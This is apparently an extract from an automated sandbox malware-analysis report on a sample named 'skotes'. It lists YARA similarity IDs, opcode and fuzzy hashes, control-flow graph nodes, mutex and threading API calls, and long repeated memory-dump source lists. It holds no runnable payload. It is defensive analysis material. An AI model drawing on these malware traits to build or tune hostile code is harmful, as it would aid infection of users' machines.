                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 34c7679e6b5fd6cb2bfbb2e87572b24318924581aabc9a6edf124dfb5449f29f
                                                                                                                                                                                                                                                  • Instruction ID: a9a64b1e8c39ce3e480b9090837c5eaceb596e2e306d9df04f800156ad9947d8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34c7679e6b5fd6cb2bfbb2e87572b24318924581aabc9a6edf124dfb5449f29f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74214C316052009BFB18AB6CDC8576DF762EBC1330F204619E458D77D1DBB99981A611

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 315 f3a856-f3a86e 316 f3a870-f3a87c 315->316 317 f3a89c-f3a89e 315->317 318 f3a892-f3a899 call f4d663 316->318 319 f3a87e-f3a88c 316->319 320 f3a8a0-f3a8a7 317->320 321 f3a8a9-f3a8b1 call f37d30 317->321 318->317 319->318 322 f3a94e 319->322 324 f3a8eb-f3a916 call f480c0 320->324 332 f3a8b3-f3a8bb call f37d30 321->332 333 f3a8e4-f3a8e6 321->333 326 f3a953-f3a987 Sleep CreateMutexA 322->326 327 f3a94e call f66c6a 322->327 334 f3a98e-f3a994 326->334 327->326 332->333 339 f3a8bd-f3a8c5 call f37d30 332->339 333->324 337 f3a9a7-f3a9a8 334->337 338 f3a996-f3a998 334->338 338->337 340 f3a99a-f3a9a5 338->340 339->333 344 f3a8c7-f3a8cf call f37d30 339->344 340->337 344->333 347 f3a8d1-f3a8d9 call f37d30 344->347 347->333 350 f3a8db-f3a8e2 347->350 350->324
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: d06ee53dbf11ca06f12dae52b5ccc819397daa37394d6a00b91c7c2405a7f39c
                                                                                                                                                                                                                                                  • Instruction ID: 93601f72191901ae7d95ff5ab4cd78ab6e056921f7748bc62956ee8443c5386a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d06ee53dbf11ca06f12dae52b5ccc819397daa37394d6a00b91c7c2405a7f39c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96217C716492018BFB28776D9C96B3EB652DF81330F200816E5C8D63D1CA7E8881B253

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 292 f3a34f-f3a35b 293 f3a371-f3a39a call f4d663 292->293 294 f3a35d-f3a36b 292->294 300 f3a3c8-f3a916 call f480c0 293->300 301 f3a39c-f3a3a8 293->301 294->293 295 f3a93a 294->295 297 f3a953-f3a994 Sleep CreateMutexA 295->297 298 f3a93a call f66c6a 295->298 307 f3a9a7-f3a9a8 297->307 308 f3a996-f3a998 297->308 298->297 302 f3a3aa-f3a3b8 301->302 303 f3a3be-f3a3c5 call f4d663 301->303 302->295 302->303 303->300 308->307 312 f3a99a-f3a9a5 308->312 312->307
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 4394e46ad5dc37df6f18a893baf47448e3660b35e90d4d681b642d2ac75d5f43
                                                                                                                                                                                                                                                  • Instruction ID: 71fe8d753cceef0606bda0c565355a22c63e59dfb77ef8b69707bcb1256f45de
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4394e46ad5dc37df6f18a893baf47448e3660b35e90d4d681b642d2ac75d5f43
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F219B327052009BFB08AB6CDC8576DBB62DBD1330F204619E448E77E0CB7A9980A322
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 57040152-0
                                                                                                                                                                                                                                                  • Opcode ID: 63b5feb69747d4dfb24cb7d4cf264c40ed869b75fe9477f32093ec39e34078ba
                                                                                                                                                                                                                                                  • Instruction ID: 3089a5aec9e6a53e9c6edacf01078283c59a47b3d893d3a4e1a7824c5b79c9ed
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63b5feb69747d4dfb24cb7d4cf264c40ed869b75fe9477f32093ec39e34078ba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66A1DFB1E01205AFDB24EF64CD4476ABBA8FF15334F048169E816D7241EB79EA04EBD1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
